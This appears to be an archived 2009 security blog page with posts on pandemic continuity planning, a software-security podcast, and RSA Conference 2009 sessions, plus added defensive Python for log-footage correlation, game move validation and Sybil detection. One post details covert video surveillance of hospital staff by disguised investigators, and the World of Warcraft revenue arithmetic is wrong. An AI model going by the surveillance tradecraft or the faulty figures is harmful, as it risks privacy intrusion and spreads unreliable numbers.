Wednesday, April 29, 2009

As WHO Escalates to Alert Level 5, Crisis Management Planning for Pandemics Offers Cyber Challenges

Electron microscope image of the reassorted N1H1 virus. The viruses are 80–120 nanometres in diameter





The WHO has raised the pandemic alert level for the swine flu to five out of six.
Dr. Margaret Chan, the director-general of the WHO, told a Geneva based press conference the world must be prepared.
"All countries should immediately activate their pandemic preparedness plan," she told an international teleconference.
Toronto Star, 4-29-09


Those of us responsible for cyber security in corporations and government agencies are also integrally involved in their organizations' business continuity and crisis management planning (and those that are not should be). This evening many such plans are being dusted off and reviewed (and in many instances, it has been far too long since they were last looked at). But there are broader, bigger issues in the fire, and hopefully, no matter what happens in regard to this immediate crisis, these issues will come into sharper focus for many.

Here are three vital areas that offer challenges which can be transformed into opportunities --

Business Continuity and Crisis Management: Most organizations have plans; and many organizations even take such plans seriously. But I argue that the plans of almost all of these organizations are based on the wrong model; i.e., a 20th Century model that says “something bad might happen someday and if it does this is what we will do.” The right model, the new model, the 21st Century model says, “Bad things will happen, and two or more bad things could well happen simultaneously, and when it/they do occur, this is how we will respond and adapt.” This is not just an age of crisis, this is an age in which multiple crises threaten, e.g., climate change, economic and financial crisis, infrastructure collapses, food and water shortages, failed states, terrorism, nuclear proliferation, and yes, pandemics. Such circumstances demand a new model for business continuity and crisis management. (To read an exploration of this and related notions, click here for my CSO Magazine feature A Corporate Security Strategy for Coping with the Climate Crisis.)

Mobility: This is one of Carnegie Mellon CyLab’s seven research thrusts. Indeed, CyLab has its own Mobility Research Center (MRC) dedicated to the exploration of the powerful wave of technological innovation that the term “Mobility” embodies. Once upon a time, organizations were striving to integrate the notions of “Telecommuting” and the “Road Warrior” into their technology/workforce mix. The model for “Telecommuting” was of a certain percent of employees sitting at a desktop computer at home instead of at the office; the “Road Warrior” model projected a sales force with laptops slung over their shoulders and cell phones held to their ears. But both models have been subsumed by a broader, more transformative notion of “Mobility.” This broader, more transformative notion has been articulated by Martin Griss, Co-Director of the CyLab MRC, as “anywhere, anytime computing.” Such a model has sweeping implications not only for business continuity and crisis management; it means moving beyond planning that is centered on just flipping the switch at a hot site to planning that also includes re-establishing a virtual workplace via diverse mobile platforms, devices and applications. It also has sweeping implications for healthcare, and yes, emergency healthcare in particular, both in the workplace and in the home. (For more on Mobile Healthcare, click here for a summary of CyBlog posts on CyLab MRC’s Mobile Healthcare Workshop in February 2009.)

Awareness and Education: Most organizations have some security awareness and education program in place, although many of these programs are uninspired and under-funded (which is very short-sighted, because money spent on awareness and education can go a long way, and have a great impact on the workforce and the workplace, if it is spent wisely). But to whatever extent your organization has a security awareness and education program, you have a delivery system with which you can reach your workforce and by extension their families, friends and neighbors. That means that you have the opportunity to disseminate information related to public health, environmental protection, emergency preparedness, etc. to your workforce and by extension to their families, friends and neighbors. Doing so not only constitutes an excellent form of public service, it also reinforces your organization’s messaging on security awareness and education by placing that messaging and the delivery system which communicates it into a positive, life-affirming framework of common good.

Hopefully, the threat of a Swine Flu pandemic will come and go without great loss of life or significant economic hardship. But let us also hope that whatever happens this time, the challenges it reminds us of will be turned into advantages by those cyber security professionals responsible for developing 21st Century programs for corporations and governments, and those cyber security technologists responsible for designing 21st Century products for the IT industry.

-- Richard Power

Sunday, April 26, 2009

Silver Bullet: Gary McGraw Interviews Virgil Gligor on Software Security and Other Vital Issues


Software security will be with us forever, as far as I am concerned; and I will tell you why, software is by and large a creative process. Don’t let anybody tell you that formal methods will account for any more than 10-15% of software development. It hasn’t happened in the last thirty plus years, and it probably will not happen in the future either. Virgil Gligor, Silver Bullet Security Interview with Gary McGraw, 4-21-09


Maybe you are a veteran of many digital wars. Maybe you are a fresh recruit to the virtual corps of info warriors. Maybe you slog on at the frontlines of corporate culture. Maybe you press the cutting edge in a lab at the other side of tomorrow. Maybe you operate out beyond enemy lines in the shadow world of the electronic underground. Whatever your level or circumstance, if you find yourself passionately engaged in the continuum that is cyber security, it is vital that you glean what you can from the experience and insights of others, whether they are along side of you or ahead of you on this treacherous trail into the future.

So I encourage you to spend twenty-seven minutes listening to this podcast of Gary McGraw’s interview with Virgil Gligor. You will benefit from this rich dialogue between thought leaders from two generations, who are both still very much on point, and you will gain invaluable perspective on some of the critical issues that confront us.

Gary McGraw, Chief Technology Officer (CTO) for Cigital, is a globally recognized authority on software security and the author of six best-selling books, including Exploiting Online Games (2007). McGraw is also editor of the Addison-Wesley Software Security series and produces the monthly Silver Bullet Security Podcast for IEEE Security & Privacy magazine.

For decades, Virgil D. Gligor, Professor of Electrical and Computer Engineering at Carnegie Mellon University and co-director of Carnegie Mellon CyLab, has been a leader in the field of cyber security research, with interests ranging from access control mechanisms, penetration analysis, and denial-of-service protection to cryptographic protocols and applied cryptography, and he has served in senior advisory roles for technology leaders, as well as the US government and the global cyber security community.

In this brief, but far-ranging interview McGraw and Gligor touch on a broad range of issues including the need for what Gligor and CyLab term “usable security,” the fate of virus scanners, the state of electronic voting, the future of the Foreign Intelligence Surveillance Act (FISA) and even how Gligor’s experience of growing up in the Romania of the communist dictator Nicolae Ceaușescu helped inspire his contribution to the field of cyber security.

-- Richard Power

Here is a transcribed excerpt followed by a link to the full podcast:

McGraw: My own work focuses on Software Security, where I think we have made some tangible progress.

Gligor: Oh, absolutely.

McGraw: I have been tracking the software security space for several years running, and in 2008, revenues from tools and services companies passed $450 million, so that’s exciting, that’s when the middle market begins to emerge, and analysts come in and start covering the space. Do you think that Software Security is here to stay?

Gligor: Software security will be with us forever, as far as I am concerned; and I will tell you why, software is by and large a creative process. Don’t let anybody tell you that formal methods will account for any more than 10-15% of software development. It hasn’t happened in the last thirty plus years, and it probably will not happen in the future either.

McGraw: Especially in the US.

Gligor: Well, anywhere. So let’s admit to that fact. No matter what we academics would like the world to be, the world is not that way, in the sense that formal methods have had minuscule penetration so far. But things are improving. Starting from that premise, there will always be bugs; consequently there is always going to be room for improvement in the software development process, because it is a creative endeavor. So what engineering does is actually help mitigate the consequences of the errors introduced, of course, because our creativity sometimes exceeds our ability to do things correctly. But I believe from that perspective that software security, as a discipline, is extremely important. By the way, at Carnegie Mellon, you don’t see a single course called Software Security, but we teach it in all of our courses. It starts from Introduction to Security, and goes to Network Security, and then it goes to Systems Software Security, and on and on. As a matter of fact, even in Applied Cryptography, we talk about software security. ... Also, we have the benefit of having the Software Engineering Institute (SEI) and the Institute for Software Research (ISR), and of course the Computer Science Department teaches a number of courses in the security aspects of software. Model checking, which is the only formal or semi-formal method applied on a larger scale, is being taught [here at Carnegie Mellon University] by one of the most recent Turing Award winners, Ed Clarke.

McGraw: So when I was starting in the computer field some twenty-three years after you were starting in the computer security field, I was at a meeting at NIST where we were bemoaning sharing information about actual exploits when someone stood up and there was some guy there, [saying] “Oh, software security is like a fad, it’s kind of like a sine wave, it comes and it goes, and it’s just come again, but it is going to go again.” You don’t believe that?

Gligor: I don’t believe any of that, but I can explain where it came from …

McGraw: Please do. I’ve always wondered.

Gligor: In the early days the idea was that we could build security kernels, which were formally verified, in other words, the software security of this kernel was assured formally. But these kernels were very small. The thought was that if we had these small kernels that were formally verified, then the applications and the rest of the operating system software could have as many bugs as possible and it would do no damage to the system. Of course, I am exaggerating this view to make a point, but essentially that was the view; and that view, unfortunately, never materialized.

McGraw: It seems like there is a ripple of that view in this notion of security co-processors in laptops, etc.

Gligor: Well, security co-processors help to actually check things faster. They helped to a significant extent to make security usable from a performance point of view. But, basically, doing all sorts of traces, and checking traces, and backing up computations essentially turn out to be good band-aids.


The Silver Bullet Security Podcast can be played online or downloaded from Cigital.

Friday, April 24, 2009

RSA Conference 2009: Summary of Posts


RSA Conference, Friday, 4-24-09

I will be blogging from some of the leading industry conferences, as well as from some of CyLab's own conferences and workshops throughout the year. You can check out the schedule in the right-hand column of this site, under the heading, "CyBlog on the Road." -- Richard Power

Here is a summary of CyBlog posts from RSA Conference 2009, in chronological order:

RSA Conference 2009: "Imagination is More Important than Knowledge" (Albert Einstein)

RSA Conference 2009: Elgamal Strikes Poignant Note, Coviello and Salem Paint in Bold Strokes

RSA Conference 2009: World-Class Cryptographers Muse on Cloud Computing and Mushroom Clouds

RSA Conference 2009: Analysts Sifting Thru the Rubble of the Economy, Address the State of the Security Business

RSA Conference 2009: Notes on Complacency and the "Smoking Gun" from BT's Briefing Luncheon

RSA Conference 2009: Melissa Hathaway -- "Security is a Marathon, and It is an Uphill Run"

RSA Conference 2009: Want to Play a Game? Gary McGraw & Expert Panel Explore the "Edge of Technology"

RSA Conference 2009: Bank InfoSecurity Issues Its 2009 Survey Results -- Lessons Learned or Unlearned?

RSA Conference 2009: Digital Forensics? E-Discovery? "Many judges still don’t know the difference between a Mega-Byte and a Dog Bite."

RSA Conference 2009: Digital Forensics? E-Discovery? "Many judges still don’t know the difference between a Mega-Byte and a Dog Bite."

Lawrence Dietz (standing), Jonathan Tal (sitting)

RSA Conference 2009, Friday, 4-24-09

Combining video surveillance with data forensics could be decisive in legal cases involving e-discovery, but there are complex issues involved. And in "Case Study; Video Data Security Convergence," Jonathan Tal and Lawrence Dietz of TAL Global Corporation shared some invaluable insights on some of them.

"Many judges still don’t know the difference between a dog bite and a mega-byte; incontrovertible video evidence goes a long way to making your case."

When should you employ combined data and video investigations?

Dietz and Tal suggest the following circumstances:

When the suspect is known to you
When you believe it is important to be able to place an individual on a device at a certain time and match that individual with the device's activity
When you can physically limit and control data entry points

But of course there are legal and privacy concerns:

Are the computers to be monitored in a public place?
What is expectation of privacy in the location where the video is taken?
Have employees and others consented to video and data monitoring?
Will data or video evidence be used in legal proceedings?

Dietz and Tal stressed that there is a difference between recording sound and video versus recording video only; if you record sound then wiretap laws kick in.

Where you conduct such surveillance is also an issue; e.g., conference rooms and reception areas in the workplace are different from bathrooms in the workplace. In a bathroom, there is a reasonable expectation of privacy.

Also, be careful to avoid accidental disclosure of medical records. In this investigation, the hidden video camera was positioned to only see the person sitting at the workstation, not what was on the screen.

Tal framed the case study they offered in their presentation.

"Once upon a time in a hospital not very far from here there was a bad doctor, a cardiologist, and he was practicing bad medicine; he was not only cavorting with the nurses, but endangering the patients. He was experimenting on patients, and the hospital took exception, and said you no longer have the right to do these experiments in our hospital. He launched a lawsuit, and started a campaign against the hospital. During the course of his campaign, he began generating information about procedures other doctors were using in the hospital, and was exploiting this information in his suit. The hospital was concerned: patient information was leaking, and this bad doctor’s attorney was using this leaked information. Where, and from whom, was this information leaking? The human side of our investigation narrowed it down to a few people who were close to the bad doctor, and we zeroed in on one doctor who was a good friend of the bad doctor. Now this good friend of the bad doctor often went to the doctor’s lounge in the hospital."

Dietz picked up the story from there.

"There were four computer workstations in this room. There was unauthorized access, but we didn't need to prove just that, we needed to prove who was doing it, who is sitting at the workstation at the moment that the unauthorized access is taking place. Of the four workstations there were two thin clients and two PCs. We went in disguised as workmen. The cover story involved an overflowing restroom. When you are dressed like a workman, people tend to ignore you, particularly in the hospital environment, where there is a heavy caste system. You want to keep the number of people who know what you are doing as small as possible. We installed one hidden camera inside a particular pillar, one that gave us a view of all four workstations. The fewer cameras the better, less tape to review. Recording was activated by motion detection. We ran an Ethernet cable to a Digital Video Recording (DVR) lock box. The power for the camera also came from the Ethernet cable. The box held approximately thirty days of storage of digital video recording."
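Tying the two evidence streams together is the crux of what Dietz describes: an access event from the workstation log has to be matched to the motion-triggered footage that shows who was at the keyboard. The following is an added example, not code from TAL Global or the presentation; the log formats, the restricted path, the account names, the timestamps and the access policy are all constructed, and the DVR clock offset is an assumed parameter measured when the box is installed.

```python
# Added example (not from the RSA session): correlate restricted-record
# accesses from a workstation log with motion-triggered DVR segments.
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Optional

FMT = "%Y-%m-%dT%H:%M:%S"
RESTRICTED_PATH = "/records/cardio"          # constructed policy
AUTHORIZED_ACCOUNTS = {"cardio_attending"}   # constructed policy

# Constructed workstation access log: time workstation account result [path=...]
ACCESS_LOG = """\
2009-03-02T21:14:05 WS-LOUNGE-1 jdoe OK
2009-03-02T21:16:40 WS-LOUNGE-3 dr_x DENIED path=/records/cardio
2009-03-02T21:17:02 WS-LOUNGE-3 dr_x OK path=/records/cardio
2009-03-03T02:03:11 WS-LOUNGE-2 svc_backup OK
2009-03-03T02:05:50 WS-LOUNGE-3 shared_nurse OK path=/records/cardio
"""

# Constructed DVR motion-segment index, on the DVR's own clock: camera start end
DVR_INDEX = """\
CAM-PILLAR 2009-03-02T21:10:30 2009-03-02T21:12:10
CAM-PILLAR 2009-03-02T21:15:55 2009-03-02T21:19:00
CAM-PILLAR 2009-03-03T02:04:20 2009-03-03T02:07:45
"""


@dataclass
class AccessEvent:
    ts: datetime
    workstation: str
    account: str
    result: str
    path: Optional[str]


@dataclass
class Segment:
    camera: str
    start: datetime
    end: datetime


def parse_access_log(text: str) -> List[AccessEvent]:
    events = []
    for parts in (line.split() for line in text.splitlines()):
        if len(parts) < 4:
            continue
        extras = dict(e.split("=", 1) for e in parts[4:] if "=" in e)
        events.append(AccessEvent(datetime.strptime(parts[0], FMT),
                                  parts[1], parts[2], parts[3], extras.get("path")))
    return events


def parse_dvr_index(text: str) -> List[Segment]:
    segments = []
    for parts in (line.split() for line in text.splitlines()):
        if len(parts) == 3:
            segments.append(Segment(parts[0], datetime.strptime(parts[1], FMT),
                                    datetime.strptime(parts[2], FMT)))
    return segments


def is_unauthorized(ev: AccessEvent) -> bool:
    # Denied attempts matter as much as successful reads: both put somebody
    # at the keyboard trying to reach the restricted records.
    return ev.path == RESTRICTED_PATH and ev.account not in AUTHORIZED_ACCOUNTS


def segments_covering(t: datetime, segments: List[Segment],
                      dvr_offset_seconds: int = 0,
                      margin_seconds: int = 30) -> List[Segment]:
    # dvr_offset_seconds = (DVR clock) - (workstation clock). The margin
    # absorbs the start/stop lag of motion-triggered recording.
    t_dvr = t + timedelta(seconds=dvr_offset_seconds)
    margin = timedelta(seconds=margin_seconds)
    return [s for s in segments if s.start - margin <= t_dvr <= s.end + margin]


def correlate(access_text: str, dvr_text: str, dvr_offset_seconds: int = 0,
              margin_seconds: int = 30) -> List[Dict]:
    """One row per unauthorized event, listing the footage to pull for it."""
    segments = parse_dvr_index(dvr_text)
    rows = []
    for ev in parse_access_log(access_text):
        if not is_unauthorized(ev):
            continue
        hits = segments_covering(ev.ts, segments, dvr_offset_seconds, margin_seconds)
        rows.append({
            "event": ev.ts.strftime(FMT),
            "workstation": ev.workstation,
            "account": ev.account,
            "result": ev.result,
            "footage": [f"{s.camera} {s.start.strftime(FMT)}-{s.end.strftime(FMT)}"
                        for s in hits],
        })
    return rows
```

An empty "footage" list for an event is itself a finding: either the camera missed the motion or the two clocks were never reconciled, which is why the offset is measured at installation rather than assumed.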

Dietz also highlighted some planning stage issues.

"Secure communications between client site IT manager, and the data and video engineers is an important issue to address, so are your remote management capabilities. Both need to be coordinated ahead of time. You also will want to have an agreement in place on what is to be reported and to whom. There should also be prior agreement on if, when and how to destroy the video and forensics evidence. Not to mention level setting for expectations as to time and cost beforehand. You will also want to establish periodic checkpoints to review evidence and assess possible actions."

It is still early on in the evolution of digital forensics, e-discovery and related skills and processes. Clearly, there is a lot of opportunity both for technological innovation and the training of professionals in law, law enforcement and security.

-- Richard Power

RSA Conference 2009: Bank InfoSecurity Issues Its 2009 Survey Results -- Lessons Learned or Unlearned?



RSA Conference 2009, Friday, 4/24/09

Bank InfoSecurity conducts an annual survey. The respondents are largely senior management in the banks and credit unions. The results of this survey are always of interest, particularly this year.

In presenting the 2009 survey results for the first time, this morning, Tom Field, Editorial Director for the Information Security Media Group, which publishes Bank InfoSecurity, began by painting the grim backdrop --

Bear Stearns, Washington Mutual and Merrill Lynch are gone.

The Dow Jones average has dropped below 7K.

In 2007, there were only five financial institution failures in the US. In 2008, there were 40 in the US. But in 2009, as I write this in the first month of the second quarter, there have already been 27.

The Heartland case, on the heels of the TJX and Hannaford cases, has made an impression on the collective psyche.

So has the Bernie Madoff case, perhaps the biggest fraud in history.

Yes, hard times have come, along with a new administration in Washington, D.C. (one inclined to refine and revive regulation).

So what does Bank InfoSecurity's survey indicate?

Here are a few of the important data points that Field touched on in his presentation:

Respondents are reporting reduced budgets, reduced staff and reduced resources. But they are also reporting increased attacks, insider risks and an increased need to outsource.

57% of respondents reported budgets being level-funded (i.e., "frozen")
26% reported the biggest impact of the economic conditions as reduced budget
19% reported increased phishing
18% reported increased attacks

In other words, in the wake of what Field characterized as an "Economic Tsunami," I would suggest that the sharks have shown up and cholera has broken out.

When asked what security concerns would likely be the main focus in 2009:

28% said risks associated w/ third-party service providers
22% said mobile users' devices
18% said insider fraud

It was also fascinating to hear the financial sector spin on the aftermath of Heartland.

According to Field, "institutions are no longer willing to silently replace cards every time someone else’s system gets breached." He quoted one $275 million institution that had one thousand credit cards on the list, calling for all of the financial institutions in the US to get together and say, "Not on our time, not on our dime."

What has been the impact of Heartland-type data breaches?

29% reported financial impact
20% reported productivity loss

But when asked what their institutions intend to do to help prevent these breaches, the significant data points were curious to me --

34% said "educate customers"
29% said "join industry group"
20% said "lobby lawmakers"

From a security perspective, these three actions are not going to make a significant impact on the risks issuing from third-party service providers. They look more like public relations efforts, and a cover-your-rear effort.

In regard to the issue of vendor management, i.e., overseeing those third-party service providers, the numbers are also not reassuring:

When asked if they require that an independent third party assess their vendors’ security controls, only 36% said yes, 15% said no, and another 38% said that they did so, but only for some vendors.

That is not good enough. That is the data point that should be moving upward fast.

But then again, those who now point their fingers at the third-party service providers they have outsourced to are the same people who blew off security professionals who raised serious concerns about the blind drive toward outsourcing in the beginning.

The push back then was that security was not going to be compromised, and that there would be contractual safeguards in place. Yada yada yada.

But, of course, that is a little too much context in a sector that only hears what it wants to hear.

Looking forward, Field identified mobile banking as a key initiative being funded, and a critical one in the hunt for younger customers.

When asked if they would be offering mobile banking in 2009:
35% reported yes
5% reported maybe

It should be another interesting year, in more ways than one.

The full survey will be available from Bank InfoSecurity soon, and I recommend it to you. Lots of food for thought.

-- Richard Power

Thursday, April 23, 2009

RSA Conference 2009: Want to Play a Game? Gary McGraw & Expert Panel Explore the "Edge of Technology"



"What we are talking about is the future of software security." Gary McGraw, Cigital

RSA Conference 2009, Thursday, 4-23-09

Exploiting Online Games


This morning, as I headed to the session I had chosen to attend for that segment of the day, I noticed it was one of three sessions lined up along the same wall. One session was standing room only. The other two were two-thirds empty.

The standing room only session was on “Seven Most Dangerous New Attack Techniques and What’s Coming Next,” the other sessions, the ones not even half-full, were on “Virtualization Security” and “Exploiting Online Games.”

This observation offers us some insight into one of the great challenges in the security space. How do you look over the horizon or beyond the obvious when what is right in front of you, and what is painfully obvious, are simply overwhelming?

Some of the thorniest problems coming down the pike will relate to security of virtualization and virtualization of security. Some of the most intriguing exploits and hacks coming down the pike will come from the world of online gaming.

But the majority of attendees, as well they should, were streaming into the session that might help them fight some of the biggest fires that are burning in their environments right now. How do you ever get ahead of the curve if you are always struggling even to stay current?

I was on my way to the session on exploiting online games. (NOTE: CyLab corporate partners can read more about the security issues raised by the trend toward virtualization in my September 2008 Intelligence Briefing on “The Shadow Side of Virtualization.”)

Gary McGraw, CTO for Cigital, moderated the panel.

Participants included Greg Hoglund, CEO of HBGary, attorney Sean Kane of Drakeford and Kane, Aaron Portnoy, a security researcher with TippingPoint, and Avi Rubin, President of Independent Security Evaluators.

In his opening remarks, Gary McGraw welcomed the scattering of attendees to the “edge of technology,” and declared “what we are talking about is the future of software security.” There are so many people out on the exhibit hall floor hawking the so-called Cloud, “even though they have no idea what it means.” But online games are massively distributed systems. “They put nine gigabyte globs in everybody’s box.”

“Virtual worlds have virtual stuff that is worth actual money, which means if you can figure out how to cheat you can make money,” McGraw continued.

“Also, the law is abundantly unclear (and dang interesting). Imagine you set up a bank in Second Life and told them you were going to pay them interest, and then you stole all the money. Those regulators who don’t regulate banks very well don’t regulate virtual banks at all.”

Noting that there are 17 million people (at least) playing online games, McGraw further suggested that drawing attention to this area of security is a way to engage and hopefully enlighten a broader audience.

“I am certain that there are not 17 million geeks in the world, so there are a lot of normals playing online games. They do not care about security; they just want to play the game. But when someone cheats them that irks the hell out of them. So this is an interesting way to start a conversation about security with normals.”

McGraw also provided some monetary context for the issues involved, e.g., one game, World of Warcraft (WoW) has 14 million subscribers, and that each one pays $14 per month. Well, $14 per month x 10 million subscribers = $240 million per month, and $240 million per month x 12 months = $1.6 billion per year.

"There is also a healthy middle market for pretend stuff."

Globalization is second-nature to online gaming, and to exploiting it as well. Indeed, the exploiting of online games is an element of the global economy. And just as cyberspace and the global economy interpenetrate, the "virtual economy" of the online games and the "real" economy of the global marketplace interpenetrate as well.

According to McGraw, in China, over 500,000 people “farm” Massively Multiplayer Online (MMO) games, e.g., farming "Gold" for WoW.

"You can pay somebody to play the game for more than they could make working for Nike."

Next up, Greg Hoglund outlined the two ways in which online gaming is attacked or its resources misappropriated: exploits and bots.

Exploits can be used to duplicate items needed for the game, including gold, or to "see stuff you're not supposed to see."

Both AFK (i.e., away from keyboard) and non-AFK bots are used to perform legal input, but in an automated fashion. They can work at the level of keystroke and mouse movement, which requires taking over the GUI and, among other things, a dedicated computer, or via thread hijacking, which allows you to call internal functions within a game directly, eliminating the need for macros.

The panel's legal expert, Sean Kane gave thumbnail sketches of the issues involved in two court cases relevant to the exploiting of online games.

Bragg v. Linden Research was based on a Second Life player's use of hacking to purchase virtual land at less than its market value. The judge determined that the company's User License Agreement (ULA) was draconian; a settlement was reached, and the player's user account was returned.

MDY Industries v. Blizzard Entertainment was based on a third party developer's marketing of software that automated play and leveling in WoW.

$6 million in damages were awarded to Blizzard. The case is in Appeals Court.

According to Kane, the "top two threat families on Microsoft's detection and removal list are online game password stealers."

"As offenders become more organized," Kane concluded, "and their operations scale up rapidly, all industry participants must strive to establish protections for their users and game spaces both in code and in law.”

Like Hoglund, Aaron Portnoy focused on the how and what of online game exploitation, citing his own experience.

"We focused on Disney's Pirates of the Caribbean -- written in a dynamic language called Python -- to the point where we had full source code within a couple of days of downloading it. They distribute all the client code on your computer."

Portnoy could change the height his character could jump from 4 feet to four hundred feet, he could also alter levels on the speed of ships or power of weapons.

McGraw interjected, "Many developers and architects don’t think about trust boundaries at all. They put it all on this guy’s computer," pointing to Portnoy, "and expect him not to look under the hood."

"I changed the speed on my ships, I ended up with a line of kids on the dock, waiting for rides. All the other ships were much slower ..." Portnoy added, "I could play Jesus by walking on water. And my guy’s walking speed was faster than the sailing speed of everybody else's ships, so I could track them down over the sea and just shoot them."

Portnoy was banned from all Disney.com sites.

The letter is framed on his wall.
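McGraw's trust-boundary point is the defender's lesson from Portnoy's story: whatever the client reports about jump height, ship speed or position, the server has to re-derive and check it against limits it owns. The following is an added example, not Disney's code or anything shown on the panel; the six-by-six map, the speed caps, the entity kinds and the replayed session are constructed assumptions.

```python
# Added example, not any real game's server code: the server owns the speed
# caps and the map, so client-reported moves are validated, not trusted.
import math
from dataclasses import dataclass, field
from typing import List, Tuple

# Constructed 6x6 world, row-major: '.' land, '~' water
WORLD = [
    "......",
    "..~~~.",
    "..~~~.",
    "..~~~.",
    "......",
    "......",
]
MAX_SPEED = {"avatar": 2.0, "ship": 4.0}       # tiles per second, server-side
ALLOWED_TILE = {"avatar": {"."}, "ship": {"~"}}
TOLERANCE = 1.05                                # slack for network jitter


@dataclass
class Entity:
    kind: str
    x: float
    y: float
    t: float                      # server receipt time of last accepted move
    strikes: List[str] = field(default_factory=list)


def tile_at(x: float, y: float) -> str:
    col, row = int(x), int(y)
    if not (0 <= row < len(WORLD) and 0 <= col < len(WORLD[0])):
        return "#"                # off the map: allowed for nobody
    return WORLD[row][col]


def validate_move(ent: Entity, x: float, y: float, t: float) -> Tuple[bool, str]:
    """t is the server's own receipt time. The only client-supplied data is
    the requested destination, which is checked rather than believed."""
    dt = t - ent.t
    if dt <= 0:
        return False, "non-monotonic timestamp"
    speed = math.hypot(x - ent.x, y - ent.y) / dt
    if speed > MAX_SPEED[ent.kind] * TOLERANCE:
        return False, f"speed {speed:.2f} exceeds cap {MAX_SPEED[ent.kind]}"
    tile = tile_at(x, y)
    if tile not in ALLOWED_TILE[ent.kind]:
        return False, f"{ent.kind} may not enter tile {tile!r}"
    return True, "ok"


def apply_move(ent: Entity, x: float, y: float, t: float) -> bool:
    """Accept the move, or leave the entity where the server last saw it
    (the client gets snapped back) and record a strike for later review."""
    ok, reason = validate_move(ent, x, y, t)
    if ok:
        ent.x, ent.y, ent.t = x, y, t
    else:
        ent.strikes.append(f"t={t}: {reason}")
    return ok


def run_constructed_session():
    """Replays a constructed session: legitimate moves, then the kinds of
    client edits described on the panel (impossible speed, walking on water)."""
    ship = Entity("ship", 2.0, 1.0, 0.0)
    avatar = Entity("avatar", 0.0, 0.0, 0.0)
    results = [
        apply_move(ship, 4.0, 1.0, 1.0),    # 2 tiles/s on water: accepted
        apply_move(ship, 4.0, 3.0, 1.5),    # exactly at the 4 tiles/s cap: accepted
        apply_move(ship, 2.0, 1.0, 1.6),    # edited client, ~28 tiles/s: rejected
        apply_move(avatar, 1.0, 0.0, 1.0),  # 1 tile/s on land: accepted
        apply_move(avatar, 2.0, 1.0, 2.0),  # avatar stepping onto water: rejected
        apply_move(avatar, 5.0, 5.0, 2.5),  # the 400-foot jump: rejected
    ]
    return results, ship, avatar
```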

In his remarks, Avi Rubin stressed the importance of identity management.

"In gaming as in other domains, it is important to be able to manage real world identities. Many attacks are possible if people can create fake identities."

Rubin gave two fascinating examples of how using a Sybil attack, i.e., being able to have multiple identities, while playing online poker could facilitate cheating.

For example, if you are holding two pair in Texas Hold 'Em and one of four cards comes up, you could get a full house: four outs from forty-six unseen cards. But if you are using a Sybil strategy, i.e., you put other players of your own in the game, you can increase your chances of winning significantly.

Of course, as Rubin noted in closing, "solving identity management will solve some but not all of the problems. Guys could still get on the phone and share their hands, and the winnings."
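One defender-side check against the Sybil problem Rubin raises, as an added example that is not from his talk or any poker operator: seats at a table whose accounts share a device fingerprint, source address or payment instrument are linked with union-find, and any table where two or more seats resolve to one identity is flagged. The sessions, attributes and link keys are constructed; as Rubin notes, this catches shared identities, not two real players on the phone.

```python
# Added example, not from Rubin's talk or any poker operator: link seats at a
# table through identity signals an operator can observe, flag Sybil clusters.
from collections import defaultdict
from typing import Dict, List, Tuple

LINK_KEYS = ("device", "ip", "payment")   # expected to be unique per real player

SESSIONS = [  # constructed; addresses are from documentation ranges
    {"table": 17, "account": "alice", "device": "fp-a1", "ip": "198.51.100.10", "payment": "card-001"},
    {"table": 17, "account": "bob",   "device": "fp-b2", "ip": "198.51.100.11", "payment": "card-002"},
    {"table": 17, "account": "carl",  "device": "fp-a1", "ip": "203.0.113.5",   "payment": "card-003"},
    {"table": 17, "account": "dana",  "device": "fp-d4", "ip": "203.0.113.5",   "payment": "card-004"},
    {"table": 42, "account": "erin",  "device": "fp-e5", "ip": "192.0.2.8",     "payment": "card-005"},
    {"table": 42, "account": "fred",  "device": "fp-f6", "ip": "192.0.2.9",     "payment": "card-005"},
    {"table": 99, "account": "gina",  "device": "fp-g7", "ip": "192.0.2.20",    "payment": "card-007"},
]


class DisjointSet:
    """Minimal union-find keyed by account name."""

    def __init__(self) -> None:
        self.parent: Dict[str, str] = {}

    def find(self, x: str) -> str:
        self.parent.setdefault(x, x)
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]   # path halving
            x = self.parent[x]
        return x

    def union(self, a: str, b: str) -> None:
        self.parent[self.find(a)] = self.find(b)


def sybil_clusters(sessions: List[dict]) -> Dict[int, List[List[str]]]:
    """Per table, the groups of two or more seats that share any link key.
    Transitive links count: alice~carl by device and carl~dana by IP puts
    all three in one cluster even though alice and dana share nothing."""
    by_table: Dict[int, List[dict]] = defaultdict(list)
    for s in sessions:
        by_table[s["table"]].append(s)
    flagged: Dict[int, List[List[str]]] = {}
    for table, seats in by_table.items():
        ds = DisjointSet()
        first_seen: Dict[Tuple[str, str], str] = {}   # (key, value) -> account
        for s in seats:
            ds.find(s["account"])
            for key in LINK_KEYS:
                sig = (key, s[key])
                if sig in first_seen:
                    ds.union(s["account"], first_seen[sig])
                else:
                    first_seen[sig] = s["account"]
        groups: Dict[str, List[str]] = defaultdict(list)
        for s in seats:
            groups[ds.find(s["account"])].append(s["account"])
        clusters = sorted(sorted(g) for g in groups.values() if len(g) > 1)
        if clusters:
            flagged[table] = clusters
    return flagged


def sybil_share(sessions: List[dict], table: int) -> float:
    """Fraction of a table's seats held by its largest linked cluster;
    0.0 when no seats are linked or the table is empty."""
    seats = [s for s in sessions if s["table"] == table]
    if not seats:
        return 0.0
    clusters = sybil_clusters(seats).get(table, [])
    return max((len(c) for c in clusters), default=0) / len(seats)
```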

I am grateful I had the opportunity to spend an hour "at the edge" with McGraw and his colleagues.

-- Richard Power

Wednesday, April 22, 2009

RSA Conference 2009: Melissa Hathaway -- "Security is a Marathon, and It is an Uphill Run"

The White House's Melissa Hathaway speaks at RSA Conference 2009


RSA Conference, 4-22-09

No, Melissa Hathaway did not disclose the findings of the 60-day review of US national cyber security ordered by President Obama and delivered to him recently. Although from the influx of media in the hour or so before her hastily scheduled remarks during today's afternoon keynote session.

We will have to wait until after Obama and his team have reviewed its contents, which certainly seems reasonable. It is after all an encouraging sign that an incoming President confronted with so many daunting challenges would have even thought to order such a sweeping and swift review.

But in her brief and heartfelt remarks, Hathaway did seem to more than hint at one important finding, i.e., that the White House must lead. Because cyber security is a national security issue, and no single agency in government could possibly oversee it for the whole of the government, the leadership must be centered in the White House. That is (or will be) as it should be.

If only more corporate leadership would recognize the need for robustness in the governance of enterprise security. (For more on this vital issue, download a copy of the CyLab Governance for Enterprise Security Survey.)

-- Richard Power

RSA Conference 2009: Notes on Complacency and the "Smoking Gun" from BT's Briefing Luncheon



RSA Conference, 4/22/09

